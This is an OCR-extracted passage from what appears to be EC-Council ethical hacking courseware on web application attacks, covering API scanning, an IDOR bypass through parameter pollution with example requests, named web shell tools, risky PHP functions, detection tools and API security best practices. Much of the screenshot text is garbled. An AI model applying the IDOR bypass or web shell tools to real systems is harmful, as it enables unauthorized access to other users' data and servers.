Astra allows attackers to detect REST APl s that are vulnerable to attacks such as XSS,
SQL injection, information leakage, CSRF, broken authentication and session
management, JWT Attack, blind XXE injection, CRLF detection, CORS misconfiguration,
and rate limiting.

Module 14 Page 2121 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

~ C © 127.0.0.1:8094/reports.html#b29bccce76cbe784f99389e816f9d125

Scanning Report

CORS M1sconf1gurat1on 1n httpJ/192 168 O 4/ token php

Summary:

Naae :CORS Misconfiguration

I 11pact:Hi9h

Reques t_Head ers: Response_Headers:

Content-Type : application/json Access-Control-Allow-Credentials : true
origin : http://attackersite.com Access-Controt-Attow-Origin : *
Connection : Keep- Alive
Content-Length : 28
Content-Type : t ext/html; charset=UTF-8
Date : Sat, 31 Mar 2018 06:53:06 GHT
Keep- Alive : t imeout=S , max= l00
Server : Apache/2. 4.25 (Unix) LibreSSl/2 . 2 . 7 PHP/ 5.6.30
X-Powered-By : PHP/5 . 6 , 30

NA

Description:CORS misconfiguration allows attacker to send a cross domain request and can read arbitrary data of ot her users

Reaidation: Validate origin header and allow only ht tp request from trusted domain

Broken Authent c<1t,on .ind 5es;;,or managernent n http 192 168 0 -l loker php

Figure 14.96: Screenshot of Astra

Some REST API vulnerability scanning tools are as follows :

• Fuzzapi (https://github.com)

• w3af (https://w3aforg)

• appspider (https://www.rapidl.com)

■ Vooki (https://www.vegabird.com)

■ OWASP ZAP (https://www.zaproxy.org)

Module 14 Page 2122 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Bypassing IDOR via Parameter Pollution

Insecure direct object reference (IDOR) is a vulnerability that arises when developers disclose references to
internal data enforcement objects such as database keys, directories, and other files, that can be exploited by
an attacker to modify the references and gain unauthorized access to data
For example, consider this normal request:
api.xyz.com/profile/user_id= 321
The attacker manipulates the above request using parameter pollution to bypass IDOR
api.xyz.com/profile/user_id=654&user_id=321

Requen Ruponff
j R- I P.11r.11ms f Huders 1Hu ) j R.11w jHudm J~ic J
ros, A HTTP / 1.l 200 011:
, _•pi/ v t/\, . .r / •e-tivity/ profih/ _ D. .rid• J • 2tS'4 , . DHrJd• SJIUlSl profilePioJd • I0201 • 1l17SO Cont•nt.- Type, applicat.i on l j•on 1ch•i-••t•OTF•I
0192 lffP/ 1.1 O•t•• : . 10,,t,os C!!I'
llo•t• •pi.- .c- S•i-v•r, Apach••Coyot•/ 1 , I
'-••p-Alive, Conn.ct.ion Conn•ction, Clo••
Aceept• • / • Cont•nt-i...nvth• 4924

- ·~i~~,.~~~•:.i
" iii
"'i°'iii°'iii
ii°'- - - - - - - - -OoM/huO/ (
Accept-1An,;11a,;e, en-n11q•l
Content - 'type I appl icat.ion / x-www-for■ -11rlencoded ~ ;:;~?'~'?. . .., I
~::!~~:;!::~....
lll"ip, Accept-iineodin11
: ~on ( Uhon•1 10:. 10.3. I I llcah/3 .00 >
" l••tt1-••
~-
• •• -
1~..!!•, I l
••

Connectio1u clo•• " ob).ct.Id" 1 1020U0122U70310,

• •i-caiv" , " ht.t.p1 / /- - - •l --:sonav,.,
payload •,7Bl 22•hO'IIIniti.al■l22 1JAfal••l2CIU~uonalQuotel 221llt,U212212Cl 2 ~Albw.1221JAI S817Bl 2 " phot.oStat.11, · I " APPROVED" ,
l photo:.tat11s l 221lAl 22J,PPROVCD l 221 2Cl 22ob )•ct.Id\22 1 3Al2210201,lll750,,1,2 , 2212c, 22i-v.ord•rl 22 \ l
A012CI 22ncaiql22 1 lAl 22ht.t.pllAUCl2FUCUF"2-- . •l · -•eionav• . coaUCl 2l"- Pict."rHUCl2F 102
0 1' ll l 7 504 9 U 2 . ) p,QI 2 2\ 2C 12 2 p rof il•P 1cl 2 2 U At rue\ 7 0 I 2c, 1a, 2 2photoStetu • \ 2 2\ lAI 2 2AP PROV£0\ 2 21 2C 12 2
,. • taao•Ord•r • : 1
(
" obJ.ct.Id" , 10202HOUllH996,

~:~;:~~di ff I I~!!~!!!:!!!!!~!!!!~~;- -~=~=~;:~~!:~: ~~!:~i~~!:;~~~: ~ ~;:~i~;~~~ ~~:~:: ~i!!~!!

lA
· •i-cllio" , • ht.t.p1 / /- - - •l--::onav,.,
" photol'.tat.11• • , " APPROVED" ,

Copynght Cl by EC·CIUDCII All Rights Reserved Reproduction is Stnctly Proh1b1ted

Bypassing IDOR via Parameter Pollution

Insecure Direct Object Reference (IDOR) is a vulnerability that arises when developers disclose
references to internal data enforcement objects such as database keys, directories, and other
files, which can be exploited by an attacker to modify the references and gain unauthorized
access to the data. These IDORs can be bypassed by providing a single parameter name
repeatedly but with unique values.
For instance, assume that the victim's user_id is 321. Attackers can change this user_id value to
654 (it is another user_id value) to identify IDOR. If the page is not vulnerable to IDOR, it
generates a "401 Unauthorized" error message.
To bypass IDOR via parameter pollution, the attacker sends two user_id parameters as a
request, in which one parameter is appended with the victim's user_id and the other one is
appended with the attacker's own user_id.
For example, consider the following request:
api.xyz.com/profile/user_id= 321
The attacker manipulates the abovementioned request using parameter pollution to bypass
IDOR:
api.xyz.com/profile/user_id=654&user id=321
When the abovementioned request is processed at the REST API endpoint, the application
verifies the first user_id parameter and ensures that the user who is sending the request has
included his/her own user_id in the GET request.

Module 14 Page 2123 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Hence, an attacker can bypass IDOR by providing two user_id parameters: one belongs to the
victim and the other belongs to the attacker. The application is tricked into to considering it as a
valid request.
Attackers use tools such as Burp Suite to proxy the traffic and intercept all the traffic to REST
API endpoints. Then, they use the parameter pollution technique to send both the attacker's
user_id and the victim's user_id in the GET request to gain unauthorized access and retrieve
sensitive data from the victim's account. Using this technique, attackers can also compromise
the application's functionality because every parameter inside the application is vulnerable to
this attack.

ft•quest ResponH
J Ra,w I P,1rams J Headers I Hex I J Rilw j Head ers f Hex )
POGT 8 H P / 1.l 200 Olt
. , . . .api/ v9 /u ■ •r/ act ivity/ prof il•/ - D••r Id• l4 215'4 • • D••rid• Sl l U l 5'prot ihP icld• l 020 14 1317 SO Content-Type: application / j ■on 1 cher■ et•OTF-8
491512 HT1'Pl l. l Oate1 I 10 :4 9105 G~T
B o ■ t: api . . . . . . .. com Server : Ai,ache-coyote/ l, l
11.eep-Alive: Conn•ct.ion Connection I Clo••
Accept 1 • / • Content-Lenoth1 4 924
Til'!& or CALL: u6, 1111uoooooo
- Accis::._Tou:u: 2
Acc•p t-Lan9ua9ai an-Ill;q•l
Content -Type: appl icat ion / x-www- f or•-ur lencodad
Contant-t.-ng th : 2223
~ !:1:~.~·~·~---.
"la •tll-•" ·a- ·,l
D••r-A9ant 1 - / 3065 ( iPhona; io:; 10 . 3. l; Gcale/3 .00)
9:ip: Accapt-Encodin9 ~ l~u!!•: I i
Connection: clo••
::~~=~:!d: !h~~:~ ;~012294 70310· •l, IUIIA~Onint• .c
" photoGtatu• · I " APPROVED " ,
• i■a9aor dar " : 1
), (
" objecttd· 1 1020286084 3UH96,
" ■ rcBiO " : "http : // ■ 3,ania:onav■ .c
" photoGt a tu• • • APPaov1.o • ,

Figure 14.97: Screenshot of Burp Suite

Module 14 Page 2124 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Shells

A web shell is a malicious piece of code or script that is developed using server-side languages such as PHP, ASP,
PERL, RUBY, and Python and are then installed on a target server

The malicious script enables attackers to gain remote access or remote administration capabilities to the target
server along with its file system

Attackers inject malicious script by exploiting most common vulnerabilities such as remote file inclusion (RFI),
local file inclusion (LFI), exposition of administration interfaces, and SQL injections

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Shells
A web shell is a malicious piece of code or script that is developed using server-side languages
such as PHP, ASP, PERL, RUBY, and Python, and then installed on a target server. The malicious
script enables attackers to gain remote access or remote administration capabilities over the
target server along with its file system .
Attackers inject malicious scripts by exploiting most common vulnerabilities such as remote file
inclusion (RFI), local file inclusion (LFI), exposition of administration interfaces, and SQL
injection. Attackers can also perform XSS attacks using social engineering techniques to install
the malicious code.
Attackers also employ network monitoring tools (mainly Wireshark) to discover vulnerabilities
that can be exploited later for web shell injection. These vulnerabilities often lie in a web
server's software or content management system (CMS).
Web shells are used by the attacker to carry out privilege escalation and gain remote access to
download, upload, erase, and execute files on the target web server. Using the web shell,
attackers can also steal private data, damage the website's reputation via DDoS attacks, change
the structure of the website, make the web page's resources unavailable on the Internet,
maintain persistence, exfiltrate data, etc.

Module 14 Page 2125 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

•
Web Server

Figure 14.98: Illustration of a web shell

Module 14 Page 2126 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Web Shell Tools

I
b374k is a PHP-based web shell that allows attackers to monitor
running processes and execute remote commands t o download, Caterpillar WebShell
https://attock.mitre.org
upload, erase or edit f iles

~
b374k shell
https://github.com

C99
https,:f/github.com

I
China Chopper
https://attack.mitre.org

- •
: R57
https://github.com

Copynght Cl by EC-CIUIR:11 All Rights Reserved Reproduction IS Strictly Prohibited

Web Shell Tools

Attackers use various web shell tools such as WSO PHP Webshell, b374k, C99, China chopper,
R57, and WSO (web shell by oRb) to gain remote control over target web servers.
■ WSO Php Webshell
Source: https://github.com
WSO Php Webshell is a web shell that allows attackers to monitor running processes
and execute remote commands to download, upload, erase, or edit files. It also allows
attackers to access and infect remote servers and access SQL databases.

Module 14 Page 2127 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Figure 14.99: Screenshot of WSO Php Webshell

Some additional web shell tools are as follows:

• Caterpillar WebShell (https://attack.mitre.org)
• b374k shell (https://github.com)
■ C99 (https://github .com)

■ China Chopper (https://attack.mitre.org)

• R57 (https://github.com)

Module 14 Page 2128 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

How to Prevent the Installation of a Web Shell

[ii Update the application and host server's OS and app ly

patches regularly ] II Deploy firewalls on the web server to monitor and control
the network traffic based on the security rul es

Establish a DMZ between the web server and the i nternal

network

Ensure the secure configuration of the web serve r using

J
Regularly auditthe accounts and review t he group
permissions t o prevent the instal lation of a web shel l
J
strong authentication techniques and avoid using default
passwords
J Disable al l unused and risky PHP functions such as exec(),
shel l_exec(), and show_source()

Block all unused ports and unnecessary services running on

the web servers II Ensure that all web applications using upload forms are
secure and penmit only white listed file types
J
Perform user input validation t o control and prevent LFI an d
RFI vul nerabilities m Use escapeshellarg() and escapeshellcmd() to ensure that
the user inputs are not injected into shel l commands

Establish a reverse proxy service for retrieving re sources

and restrictingadm in URLs to know n, legitimate ones
J m Do not install unnecessary third-party pl ugins and regularly
check and update the plugins used

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

How to Prevent the Installation of a Web Shell

The following are various best practices for preventing the installation of a web shell:
■ Update the application and host server's OS and apply patches regularly to protect the
application from known bugs.
• Establish a demilitarized zone (DMZ) between the web server and the internal network.
• Ensure the secure configuration of the web server using strong authentication
techniques and avoid using default passwords.
• Block all unused ports and unnecessary services running on the web servers.
• Perform user input data validation to control and prevent local file inclusion (LFI) and
remote file inclusion (RFI) vulnerabilities.
■ Establish a reverse proxy service for retrieving resources and restricting admin URLs to
known, legitimate ones.
■ Perform regular vulnerability scans to detect the areas of threats using any web security
software.
■ Deploy firewalls on the web server to monitor and control the network traffic based on
the security rules.
■ Deactivate directory browsing in the web server to prevent directory traversal attacks.
■ Regularly audit the accounts and review the group permissions to prevent the
installation of a web shell from the web server to th e internal network.
■ Disa ble all unused and risky PHP functions such as exec() , shell_exec() ,
show_source (), proc_ open (), passthru () , and pcntl_ exec () .

Module 14 Page 2129 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Use escapeshellarg () and escapeshellcmd () to ensure that the user inputs

are not injected into shell commands to avoid command execution vulnerabilities.
■ Ensure that all the web applications using upload forms are secure and permit only the
whitelisted file types.
■ Avoid using code from untrusted websites or online forums.
■ Do not install unnecessary third-party plugins and regularly check and update the
plugins used.
■ Implement a least-privilege policy to ensure that applications do not have direct access
to write or modify the web-accessible directory.
■ Implement a zero-trust architecture using software-defined networking (SON) to
establish network communication through authorization.
■ Employ host-based security solutions that offer advanced features such as machine
learning and file reputation.
■ Deploy logging tools such as Auditd or Microsoft Sysmon to detect anomalous behavior.
■ Limit the number of ports that can access the web server.
■ Disable sensitive directories that permit uploading through media files. If disabling is not
possible, rename the directories and limit access.
■ Manually verify the source code of the files to identify any suspicious code added
recently.

Module 14 Page 2130 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Web Shell Detection Tools

n r,n Wn~DN-
Web Shell Detector +. C ff Cl lo(.alhost/-..dnan/PttP-~II-Dl,1fflortl:wu/PHP-Sh~I-OttKICN'/thtl~1w..php

Web Shell Detector is a PHO/ Web Shell Detector vl .62

Python-based script that assists in
scanning and discover ing
Nlffl:liw-~thelsln---lt;J52
php/ cgi(perl)/ asp/ aspx shells
Ftl11Kaf'ld0ne,Wll!hr4:4fllesl0~

Web Shell Detection Tools

10:30:JS 2 7 /05/2022
09:20:02 21/05/1.022
8 Fi reEye Network Security
(https://www.f ireeye.com)

e NeoPI (https://github.com ) ee -45 :±:1 ~~~~~~~~~~==

(b;JJt);~ CIDL.llZ);tyU.em aman);PMMl'nl ~ ;PMWnt ~ ;PQPlft <b.lSIZ);~o«ode: Cb.Dl);~oeooclt lliDL
Cb.lZD,.,_ OOl:lll);""""" Cb.m),...i CliOLml,~_o«odt 0Dalll),tlffe64_oec:oot <b.lZn),i , , , ~ ~ ,..,.. CID
(b..2:!ZD;c-.l ~ ;...i 0il:ll:l!2Z);...a {b.D2S);....,baw64_damde (lm.llil),~claalde t'.b.2Sl};l)WH.jr(Jll (b:262S>;bn
8 AntiShell Web Shell Hunter ~ .bneM_dealdl: (b.;.lll3);

(https://ontishe/1. com) ,..,......r,....,..~

SC.tw: l ~ Na fo.n:landO~l'o.nl
8 Astra (https://www.getostra.com)

https://www.shelldecector.com
Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Shell Detection Tools

Attackers often try to discover vulnerabilities in an application or web page, through which they
target the web servers. Then, they exploit those vulnerabilities to install backdoors via web
shells to gain remote access and perform malicious operations on the target server. To prevent
such attacks, it is mandatory to carry out regular web shell or backdoor scanning. Security
professionals use tools such as Web Shell Detector, FireEye Network Security, and NeoPI to
detect these web shells on the target servers.
■ Web Shell Detector
Source: h ttps ://www.she//detector. com
Web Shell Detector is a PHP/Python-based script that helps in scanning and discovering
php/cgi(perl)/asp/aspx shells. It has a web shells signature database that helps in
discovering the web shell".

Module 14 Page 2131 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Web Shell Oetecto,

C: ~ C} localhostl-•dn~/PHP-Sh•II-Dettctor/baru/PHP-Sh•II-Ottoctor/sh•lld•t•ct.php _ _ _ _ _ _ _ _ _ 0_*_ f El f _

Web Shell Detector v1.62

Starting file scanner, please be patient file seaming can rake some time.

Number of known shells In database Is: 352

Ale scan done, we have: 4 nles to anallze

~ bahaYlar found In: AntlSec!hall""

Anll5ecShell.php

501

06'1'1

10:30 :35 27/0 5/2022

0 9:20:02 27/ 0 5 / 2 0 2 2

-9S5e9fad lc14108110e 175'18

189.18 KB

base64_dec0de (hnl..l2);popen ~ ;popen ~ ;exec Ol!ll.ill);exec (l!nl;ll);system ~ ;system

Clin!:;lZ§);passthru (!in!:..lZZ);passthru ~ ;popen Olnt;J.Z2J;exec Otat..m);exec Cllol:;.lill;shell_exec (llnc;.C
~ ;system (ILlllW2Z);system ~ ;passthru ~ ;passthru ~ ;popen ~ ;base64_dec0de ~ );base64_dec0de ~
(ttm);exec Cll!!taZ§);system ~ );eval ~ );base64_decode ~ );base64_dec:Ode ~ ;base64_dec0de Cl!!!l;lllfil);eval CllD!
~ );eval (~ ;eval ~ ;eval ~ ;eval, base64_dec0de ~ ;base64_dec0de ~ ;pa™>_ini_file ~ ;bas
~ ;base64_<lecode Cllnt..lQa);

ft (1f wrong M?f'Ofl fi!t for tNh«l

status: 1 suspidous files found and O shells found

Figure 14.100: Screenshot of W eb Shell Detector

Some web shell detection tools are listed below:

■ FireEye Network Security (https://www.fireeye.com)
■ NeoPI (https://github.com)
■ AntiShell Web Shell Hunter (https://antishell.com)
■ Astra (https://www.getastra.com)

Module 14 Page 2132 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Cert ified Ethical Hacker
Hacking Web Applications

Secure API Architecture

APl s are vulnerable to the lat est and most sophisticat ed Enterprise Network
cyber-attacks due to various security flaws induced by poor
programming practices and the transparency f eatures of APls

To saf eguard APls from these attacks, security professionals

and developers need to create a secure API architecture,
effective security strategies, and mitigation policies

API architecture is built using an API gatew ay consisting of

fi rewa lls that work as a server t o control t he traffic and
detect all possible attacks

API gateways provi de many security capabilities and control s

Mobile
such as access cont rol, threat detection, confidentiality, Devices
Driven Integrations

integrity, audit management, and authent ication to t he API [ API Clients I

security adm in

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Secure API Architecture

API is a popular technology that acts as a gateway for communication and integrates different
applications using the web. API is widely employed due to its advanced techniques and its use
of the prevailing infrastructure. It is vulnerable to the latest and sophisticated cyber-attacks due
to various security flaws induced by poor programming practices and also due to its
transparency. To safeguard API from these attacks, security professionals and developers need
to establish a secure API architecture, effective security strategies, and mitigation policies.
API architecture is built using an API gateway consisting of firewalls that work as a server to
control the traffic and detect all possible attacks. Executing the security policy for the API
security architecture is achieved by isolating the API implementation and API security into
different layers. These layers emphasize that the API design and API security perform different
roles that require a different field of expertise. It focuses on the logical separation of concerns,
where one emphasizes the knowledge of solving the right problem at the right time.
Under a secure API architecture, the API developer focuses only on the application domain,
ensures that all of the API is properly designed, and helps in integrating API with different
applications. The security process of the published API is implemented by the API security
professional; hence, the API developer need not be concerned with securing the published APL
Only API security professionals have the authority to apply security policies to APls in the
organization. These professionals mainly focus on identity, threats in the API, and data security.
Hence, they need advanced and appropriate tools to perform security t asks, which are separate
from the API implementation. Security professionals use API gateways that are hardened
appliances available in both physical and virtual forms. These gat eways are installed in the
demilitarized zone (DMZ) of an organization. The API gateway also acts as a secure proxy
between the internal application and the external public Internet. It provides many security

Module 14 Page 2133 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

capabilities and controls to the API security admin, such as access control, threat detection,
confidentiality, integrity, audit management, authentication, message validation, and rate-
limiting of all the APls published by the organization.

Enterprise Network

Internal API Servers

Mobile Cloud Informal API

Driven Integrations
Devices

API Clients

Figure 14.101: Secure API architecture

Implementing Layered Security in an API

APls are commonly used by business organizations for connecting different services and
transferring data. Attackers attempt to exploit API vulnerabilities such as broken authentication
and security misconfiguration for malicious purposes. Exposed APls can become a major cause
for the breach of sensitive data such as personally identifiable information (PII) to the public.
Hence, developers must use multiple security layers to avoid API exposure and data breaches.
Considering the scenario of an API that fetches the transactions of a company, developers and
security experts can implement the following layer-based security for the API:
• Layer one

The API validates the user to check whether the entity is authorized by the company. In
this situation, the developers can use API security, by which an exception will be
returned if the user is not authorized or permitted. For example, the API may throw a
"Company Not Found" exception. This helps the API developer identify any invalid
company.

Module 14 Page 2134 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Layer two
In this layer, middleware can be used by the API to provide a query plan by calling the
data layer. The database layer declares a filter for the company ID before sending a
request. Developers can include a security mechanism to return an exception such as
"Unsafe Data Query" in the absence of such a filter.
■ Layer three
In this layer, an SQL join must be used to query an SQL database using the data link layer
based on API calls. This helps in ensuring that all the queries match the user responsible
for the API call. Moreover, this verifies the user context, in contrast to its data stored by
the SQL layer.
■ Layer four
This layer creates a mapper layer that enables the conversion of all the database records
into different user-visible models. This technique can be used to prevent sensitive data
such as implementation details from the public or customers.
■ Layer five
The response filter of the API verifies the models that are generated by the mapper
layer above. After the response filter declares that the records match the user calling
that API, it allows the user to observe a specific account. This layer discards the data
models without clearly flagging the account of a cu stomer by double-checking the work
of other layers.

Module 14 Page 2135 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

API Security Risks and Solutions

Solutions EDI Solutions
e Do not expose i nternal variables or obj ect names as
e Perform obj ect-level author izatio n checks and APl6 Mass Assignment inputs
Broken Object scruti nize the authorization pol icies
APl1 e Whitelistal l properties that theclientcan update
Level Aut horization e Impl ement robust access control policy for e Har den API security continuously
random and unpredictableobject ID va l ues Security
APl7 e Use scanning tools and human reviews to examine
M isconfiguration
the entireAPI stack for security mis configurations
e Use standard and uniform authentication
mechanisms for allAPI endpoints e Perform input va l idation and whi telisting
Broken User
APl2 e Implement a parameterized interface for processing
Aut henticat ion e Exami ne and i mplement the authentication
requirements within the ASVS APIS Inject ion inboundAPI requests
e Ensurethatthe filteringlogic limi ts thenumber of
e Ens ure that proper filtering is performed on the
records returned
Excessive Dat a server side rather than the cl ient side
APl3 e Maintaina proper inventory of al l API environments
Exposure e Scruti nize the data flow from the endpoi ntto the
e Conduct a security review of al l APls mainly focusing
clien t Improper Assets
APl9 on standardizi ng functions
e Ens ure appropriate rate-limiting controls a r ein Management
e Create a risk l evel ranking of the APls and improve
Lack of Resources pl ace
APl4 the security o f higher riskAPl s
and Rate Limiting e Use the OW/JSP automated threat h andbook as a
knowledge source for preventing bots e Use standard logging format for all theAPls that
Insufficient
support incident response activities
e Avoid function-level author ization APllO Logging and
Broken Function e Regularl y monitor all theAPI endpoints in all phases
APIS e Use simplean d sta ndard authorization and set Monitoring
Level Authorization of production, stage, test, and development
the defaultsettingto deny
http

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

API Security Risks and Solutions

Source: https://owasp.org
According to OWASP, the following are the top 10 API Security Risks and Solutions :

API Risks Solutions

• Perform object-level authorization checks for every function
Broken Object accessing the data source with input from the user
APll Level • Scrutinize the implementation of the authorization policies
Authorization • Implement a robust access control policy for random and
unpredictable object ID values
• Use standard and uniform authentication mechanisms for all the
API endpoints

APl2
Broken User • Examine and implement th e authentication requirements within
Authentication the Application Security Verification Standard (ASVS)
• Make sure to have strong business requirements before exposing
unauthenticated API endpoints publicly

Excessive Data
• Ensure that proper filtering is performed on the server side and
APl3 not on the client side
Exposure
• Scrutinize the data flow from the endpoint to the client
Lack of • Ensure appropriate rate-limiting controls are in place
APl4 Resources and • Use OWASP Automated Threat Handbook as a knowledge source
Rate Limiting for preventing bots from consuming your resources
Broken Function • Avoid function-level authorization
APIS Level • Use simple and st andard authorization and enable the default
Authorization setting to deny

Module 14 Page 2136 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reprod uction is St rictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Mass ■ Do not expose the internal variable or object names as inputs

APl6
Assignment ■ Ensure whitelisting of all the properties that the client can update

■ Perform hardening process against API continuou sly

Security
APl7 ■ Use scanning tools and human reviews to examine the entire API
M isconfiguration
stack for security misconfigurations
■ Perform input val idation and whitelisting
■ Implement a parameterized interface for processing inbound API
APl8 Injection requests
■ Ensure that the filtering logic limits the number of records
returned
■ Maintain proper inventory of all API environments including
production, staging, testing, and development
Improper Assets ■ Conduct a security review of all APls, mainly focusing on
APl9
Management standardizing functions
■ Create a risk level ranking of the APls and improve the security
functions for AP ls having a higher ri sk level
■ Use standard logging format for all the AP ls that support incident
Insufficient
response activities
APllO Logging and
■ Regularly monitor all the API endpoints in all phases of
Monitoring
production, staging, testing, and development
Table 14.5: OWASP Top 10 API Security Risks and Solutions

Module 14 Page 2137 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Best Practices for API Security

a Use server-generated tokens embedded in HTML as hidden

fields for validating the incoming requests II Conduct regular security assessments to secure all the
API endpoints using automated tools

II Sanitize the data to eliminate malicious scripts and properly

va lidate the user input II Use tokens to establish trusted identities and to control
access to se rvices and resources

El Use an optimized firewall to ens ure that all the unused,

unnecessary files and permissive rules are revoked 11!1 Use signatures to ensure that only authorized users can
decrypt or modify data

II Use IP whitelisting t o create a list of trusted IP addresses to

access APls and to limit access to trusted users m Employ packet sniffers to track events related to information
disclosure and to detect insecure API calls

El Use the rate-limiting feature to limit the number of API calls

made by a client in a particular time frame m Use techniques such as quotas and throttling to control
and track the API usage

II Impleme nt a pagination technique that can divide a single

response into several fragments m Implement API gateways to authenticate the traffic and
control and analyze the usage of APls

II Use parameterized statements in SQL queries to prevent

inputs that include entire SQL statements m Implement MFA and use authentication protocols such as
AppToken, 0Auth2, and OpenlD Connect

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Best Practices for API Security

Various best practices for securing APls against cyberattacks are as follows:
■ Use the HTTPS protocol through SSL/TLS certificates that support encryption techniques
and provide a secure connection between the server and client.
■ Use server-generated tokens embedded in HTML as hidden fields for validating the
incoming request and to check if it is from an authenticated source .
■ Sanitize the data to eliminate malicious scripts and properly validate the user input.
■ Use an optimized firewall to ensure that all the unused, unnecessary files and
permissive rules are revoked.
■ Use IP whitelisting to create a list of trusted IP addresses or IP ranges to access APls and
to limit access to trusted users or components only.
■ Use the rate-limiting feature to limit the number of API calls made by the client in a
particular time frame.
■ Maintain and monitor access logs regularly to help in detecting anomalies and to take
precautionary measures in the future.
■ Implement a pagination technique that can divide a single response into several
fragments so that the payloads are not oversized.
■ Use parameterized statements in SQL queries to prevent inputs that include entire SQL
statements.
■ Perform input validation on the server side instead of the client side to prevent
bypassing attacks.

Module 14 Page 2138 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Conduct regular security assessments to secure all the API endpoints using automated
tools.
■ Regularly monitor and perform continuous auditing of the API and analyze the
workflows to prevent any attacks.
■ Use tokens to establish trusted identities and to control access to services and
resources.
■ Use signatures to ensure that only authorized users can decrypt or modify data.
■ Employ packet sniffers to track events related to information disclosure and to detect
insecure API calls.
■ Use techniques such as quotas and throttling to control and track the API usage and to
set the API request limit.
■ Implement API gateways to authenticate the traffic and control and analyze the usage of
APls.
■ Implement advanced techniques to prevent sophisticated human-like bots from
accessing the APls.
■ Implement multi-factor authentication (MFA) and use authentication protocols such as
AppToken, 0Auth2, and OpenlD Connect to authenticate the users and applications in
the API.
■ Document audit logs before and after every security event, and sanitize the log data to
prevent log injection attacks.
■ Use SOAP APls with in-built security features instead of conventional design-based REST
APls.
■ Confine the API response data to the requested resource permission status, instead of
sharing an excessive amount of secret data through status messages or resource replies.
■ Use WAF security along with TLS/SSL for securing the APls and reducing the attacks
based on web traffic and script injections.
■ Ensure that all the requests made from stateless communication APls such as REST API
are authorized separately, even if they originated from the same user.
■ Employ advanced routing and controlling technologies such as service mesh technology
to manage multi-service authentication and access control.
■ Insist that the API developers consider the latest security vulnerabilities and risks related
to APls through open-source materials, articles, and biogs.

Module 14 Page 2139 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

